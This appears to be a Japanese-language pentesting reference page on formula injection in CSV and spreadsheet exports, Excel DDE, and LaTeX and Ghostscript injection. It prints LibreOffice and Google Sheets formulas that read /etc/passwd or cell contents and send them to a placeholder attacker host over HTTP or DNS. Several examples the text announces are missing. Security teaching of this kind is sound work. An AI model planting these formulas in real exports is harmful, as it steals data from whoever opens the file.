Formula/CSV/Doc/LaTeX/GhostScript Injection
Last updated
Last updated
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE) GCPハッキングを学び、実践する: HackTricks Training GCP Red Team Expert (GRTE)
あなたの入力がCSVファイル(またはExcelで開かれる可能性のある他のファイル)内に反映されている場合、ユーザーがファイルを開くときや、ユーザーがExcelシート内のリンクをクリックするときに実行されるExcelの数式を挿入できるかもしれません。
現在、Excelは外部から何かが読み込まれたときに(何度も)ユーザーに警告します。これは、悪意のある行動を防ぐためです。したがって、最終的なペイロードには特別な社会工学的努力が必要です。
以下の例は、最終的なExcelシートからコンテンツを抽出し、任意の場所にリクエストを行うのに非常に役立ちます。しかし、リンクをクリックする必要があり(警告プロンプトを受け入れる必要があります)、それが必要です。
以下の例は、https://payatu.com/csv-injection-basic-to-exploit から取られました。
学生記録管理システムにおけるセキュリティ侵害がCSVインジェクション攻撃を通じて悪用されることを想像してください。攻撃者の主な意図は、教師が学生の詳細を管理するために使用するシステムを侵害することです。この方法は、攻撃者がアプリケーションに悪意のあるペイロードを注入することを含み、具体的には学生の詳細用のフィールドに有害な数式を入力することです。攻撃は次のように展開されます:
悪意のあるペイロードの注入:
攻撃者は学生詳細フォームを提出しますが、スプレッドシートで一般的に使用される数式(例:=HYPERLINK("<malicious_link>","Click here")
)を含めます。
この数式はハイパーリンクを作成するように設計されていますが、攻撃者が制御する悪意のあるサーバーを指しています。
侵害されたデータのエクスポート:
教師は侵害に気づかず、アプリケーションの機能を使用してデータをCSVファイルにエクスポートします。
CSVファイルを開くと、依然として悪意のあるペイロードが含まれています。このペイロードはスプレッドシート内でクリック可能なハイパーリンクとして表示されます。
攻撃のトリガー:
教師はハイパーリンクをクリックし、それが学生の詳細の正当な部分であると信じています。
クリックすると、機密データ(スプレッドシートや教師のコンピュータからの詳細を含む可能性があります)が攻撃者のサーバーに送信されます。
データのログ記録:
攻撃者のサーバーは、教師のコンピュータから送信された機密データを受信し、ログに記録します。
攻撃者はこのデータをさまざまな悪意のある目的に使用し、学生や機関のプライバシーとセキュリティをさらに侵害することができます。
詳細については、元の投稿を確認してください。
特定の構成や古いバージョンのExcelでは、動的データ交換(DDE)と呼ばれる機能が任意のコマンドを実行するために悪用される可能性があります。これを利用するには、次の設定を有効にする必要があります:
ファイル → オプション → トラストセンター → トラストセンターの設定 → 外部コンテンツに移動し、動的データ交換サーバーの起動を有効にします。
悪意のあるペイロードを含むスプレッドシートが開かれると(ユーザーが警告を受け入れた場合)、ペイロードが実行されます。たとえば、計算機アプリケーションを起動するためのペイロードは次のようになります:
追加のコマンドも実行できます。たとえば、PowerShellを使用してファイルをダウンロードして実行することができます:
LibreOffice Calcはローカルファイルを読み取り、データを外部に流出させるために使用できます。以下はいくつかの方法です:
ローカルの/etc/passwd
ファイルから最初の行を読み取る:='file:///etc/passwd'#$passwd.A1
読み取ったデータを攻撃者が制御するサーバーに流出させる:=WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)))
1行以上を流出させる:=WEBSERVICE(CONCATENATE("http://<attacker IP>:8080/",('file:///etc/passwd'#$passwd.A1)&CHAR(36)&('file:///etc/passwd'#$passwd.A2)))
DNS流出(読み取ったデータを攻撃者が制御するDNSサーバーへのDNSクエリとして送信):=WEBSERVICE(CONCATENATE((SUBSTITUTE(MID((ENCODEURL('file:///etc/passwd'#$passwd.A19)),1,41),"%","-")),".<attacker domain>"))
Google SheetsはOOBデータ流出のために悪用できる関数を提供します:
CONCATENATE: 文字列を結合します - =CONCATENATE(A2:E2)
IMPORTXML: 構造化データタイプからデータをインポートします - =IMPORTXML(CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")
IMPORTFEED: RSSまたはATOMフィードをインポートします - =IMPORTFEED(CONCAT("http://<attacker IP:Port>//123.txt?v=", CONCATENATE(A2:E2)))
IMPORTHTML: HTMLテーブルまたはリストからデータをインポートします - =IMPORTHTML (CONCAT("http://<attacker IP:Port>/123.txt?v=", CONCATENATE(A2:E2)),"table",1)
IMPORTRANGE: 別のスプレッドシートからセルの範囲をインポートします - =IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")
IMAGE: セルに画像を挿入します - =IMAGE("https://<attacker IP:Port>/images/srpr/logo3w.png")
通常、インターネット上でLaTeXコードをPDFに変換するサーバーは**pdflatex
**を使用します。
このプログラムはコマンド実行を(不)許可するために3つの主要な属性を使用します:
--no-shell-escape
: \write18{command}
構文を無効にします。texmf.cnfファイルで有効になっていてもです。
--shell-restricted
: --shell-escape
と同じですが、事前定義された「安全な」コマンドのセットに制限されています(**Ubuntu 16.04ではリストは/usr/share/texmf/web2c/texmf.cnf
にあります)。
--shell-escape
: \write18{command}
構文を有効にします。コマンドは任意のシェルコマンドであることができます。この構文は通常、セキュリティ上の理由から許可されていません。
ただし、コマンドを実行する他の方法もあるため、RCEを避けるためには--shell-restricted
を使用することが非常に重要です。
[
や$
のようなラッパーでインジェクションを調整する必要があるかもしれません。
コマンドの入力はstdinにリダイレクトされるので、一時ファイルを使用して取得します。
LaTexエラーが発生した場合は、悪い文字なしで結果を得るためにbase64を使用することを検討してください。
From @EdOverflow
チェック https://blog.redteam-pentesting.de/2023/ghostscript-overview/
AWSハッキングを学び、練習する:HackTricks Training AWS Red Team Expert (ARTE) GCPハッキングを学び、練習する:HackTricks Training GCP Red Team Expert (GRTE)